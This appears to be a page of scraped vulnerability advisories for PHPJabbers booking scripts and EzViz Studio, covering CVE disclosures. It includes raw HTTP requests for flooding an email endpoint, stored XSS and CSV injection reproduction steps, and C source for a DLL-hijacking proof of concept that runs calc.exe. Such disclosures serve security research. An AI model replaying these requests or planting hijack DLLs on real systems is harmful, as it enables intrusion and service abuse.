PHPJabbers Appointment Scheduler version 3.0 suffers from a CSV injection vulnerability.

    # Exploit Title: PHPJabbers Appointment Scheduler v3.0 - CSV Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, MS Office 2010# CVE-2023-48841Descriptions:PHPJabbers Appointment Scheduler v3.0 is vulnerable to CSV injectionvulnerability which allows an attacker to execute remote code. Thevulnerability exists due to insufficient input validation on theUnique ID field in the Reservations list that is used to construct aCSV file.Steps to Reproduce:1. Login your panel.2. Go to Options Menu then click Language then click Labels section.3. Now use CSV Injection Payload in any field and go to Import/Export.4. Now click export and open your system.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48841)

PHPJabbers Appointment Scheduler 3.0 CSV Injection

PHPJabbers Appointment Scheduler version 3.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Apointment Scheduler v3.0 - No Rate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48840Descriptions:PHPJabbers Apointment Scheduler v3.0 is vulnerable to Rate limiting.Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701529051_590/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 426Origin: https://demo.phpjabbers.comReferer: https://demo.phpjabbers.com/1701529051_590/index.php?controller=pjBaseOptions&action=pjActionEmailSettingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&value-string-o_smtp_sender=&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then Start Attack and check mail.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48840)

PHPJabbers Appointment Scheduler 3.0 Missing Rate Limiting

PHPJabbers Appointment Scheduler version 3.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple Stored XSS# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48839Descriptions:PHPJabbers Appointment Scheduler v3.0 is vulnerable to Multiple StoredCross-Site Scripting. Multiple Stored XSS is a type of securityvulnerability that occurs when an application or website allows anattacker to inject malicious scripts into the content that ispermanently stored on the server. Unlike reflected XSS, where themalicious script is embedded in a URL and executed immediately, storedXSS involves the persistent storage of the malicious script on thetarget server, waiting for unsuspecting users to access thecompromised content.Steps to Reproduce:1. Login your panel.2. Vulnerable parameters are "name, plugin_sms_api_key,plugin_sms_country_code, calendar_id, title, country name,customer_name".3. Go to System Menu then click SMS Settings.4. Then use any XSS Payload in "SMS API Key", "Default Country Code"input field and Save.5. You will see popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48839)

PHPJabbers Appointment Scheduler 3.0 Cross Site Scripting

PHPJabbers Appointment Scheduler version 3.0 suffers from multiple html injection vulnerabilities.

    # Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple HTML Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48838Descriptions:PHPJabbers Appointment Scheduler v3.0 is vulnerable to Multiple HTMLInjection. HTML injection, also known as HTML code injection orcross-site scripting (XSS), is a web security vulnerability thatallows an attacker to inject malicious code into a web page that isthen viewed by other users. This can lead to various attacks, such asstealing sensitive information, session hijacking, defacement ofwebsites, or delivering malware to users.Steps to Reproduce:1. Login your panel.2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48838)

PHPJabbers Appointment Scheduler 3.0 HTML Injection

EzViz Studio v2.2.0 is vulnerable to DLL hijacking.

PoC:

*DLL Hijacking via EzViz Studio (Reported by EAFZ from Pythongoras)*

*Author: EAFZ aka myantti3m*

*CVE: **CVE**-2023-41613.*

*Test Environment:*

OS: Windows 11 Pro 64 bit(10.0,  Build 2261)

EzViz Studio version: 2.2.0

*Technical Description *

*1.  **Technical Description *

EzvizStudio.exe searches for a DLL called TcApi.dll. Because TcApi.dll  
doesn’t exist in any of the paths of the DLL search order. In particular,  
some paths have writable permissions for normal users as:

·         C:\Users\<Username>\AppData\Local\Programs\Microsoft VS  
Code\bin\TcApi.dll

·         C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

So we can plant “malicious” TcApi.dll inside these directories and wait  
until the application will load it.

*POC*

We created a malicious DLL file (TcApi.dll) and complied it. In our case,  
it opens calc.exe. You can see the code below:

#include <windows.h>

#pragma comment (lib, "user32.lib")

#include "pch.h"

#include <iostream>

#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule,

       DWORD nReason, LPVOID lpReserved) {

       switch (nReason) {

       case DLL_PROCESS_ATTACH:

              system("calc.exe");

              break;

       case DLL_PROCESS_DETACH:

              break;

       case DLL_THREAD_ATTACH:

              break;

       case DLL_THREAD_DETACH:

              break;

       }

       return TRUE;

}

Copy “malicious” TcApi.dll to

C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

If we run the EzVizStudio again, the code from the “malicious” DLL runs

CVE-2023-41613: EzViz Studio 2.2.0 DLL Hijacking ≈ Packet Storm

PHPJabbers Car Rental version 3.0 suffers from an html injection vulnerability.

    # Exploit Title: PHPJabbers Car Rental v3.0 - HTML Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48837Descriptions:PHPJabbers Car Rental v3.0 is vulnerable to HTMl Injection. HTMLinjection, also known as HTML code injection or cross-site scripting(XSS), is a web security vulnerability that allows an attacker toinject malicious code into a web page that is then viewed by otherusers. This can lead to various attacks, such as stealing sensitiveinformation, session hijacking, defacement of websites, or deliveringmalware to users.Steps to Reproduce:1. Login your panel.2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48837)

PHPJabbers Car Rental 3.0 HTML Injection

PHPJabbers Car Rental version 3.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: PHPJabbers Car Rental v3.0 - Multiple Stored XSS# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48836Descriptions:PHPJabbers Car Rental v3.0 is vulnerable to Multiple Stored Cross-SiteScripting. Multiple Stored XSS is a type of security vulnerabilitythat occurs when an application or website allows an attacker toinject malicious scripts into the content that is permanently storedon the server. Unlike reflected XSS, where the malicious script isembedded in a URL and executed immediately, stored XSS involves thepersistent storage of the malicious script on the target server,waiting for unsuspecting users to access the compromised content.Steps to Reproduce:1. Login your panel.2. Vulnerable parameters are "name, plugin_sms_api_key,plugin_sms_country_code, calendar_id, title, country name,customer_name".3. Go to System Menu then click SMS Settings.4. Then use any XSS Payload in "SMS API Key", "Default Country Code"input field and Save.5. You will see popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48836)

PHPJabbers Car Rental 3.0 Cross Site Scripting

PHPJabbers Car Rental version 3.0 suffers from a CSV injection vulnerability.

    # Exploit Title: PHPJabbers Car Rental v3.0 - CSV Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, MS Office 2010# CVE-2023-48835Descriptions:PHPJabbers Car Rental v3.0 is vulnerable to CSV injectionvulnerability which allows an attacker to execute remote code. Thevulnerability exists due to insufficient input validation on theUnique ID field in the Reservations list that is used to construct aCSV file.Steps to Reproduce:1. Login your panel.2. Go to Options Menu then click Language then click Labels section.3. Now use CSV Injection Payload in any field and go to Import/Export.4. Now click export and open your system.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48835)

PHPJabbers Car Rental 3.0 CSV Injection

PHPJabbers Car Rental version 3.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Car Rental v3.0 - No Rate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48834Descriptions:Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701528105_124/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 502Origin: https://demo.phpjabbers.comReferer: https://demo.phpjabbers.com/1701528105_124/index.php?controller=pjBaseOptions&action=pjActionEmailSettings&err=PBS03Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then attack.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48834)

PHPJabbers Car Rental 3.0 Missing Rate Limit

PHPJabbers Time Slots Booking Calendar version 4.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - No RateLimit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/# Version: v4.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48833Descriptions:Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701527883_624/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 502Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then attack.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48833)

Tag

#windows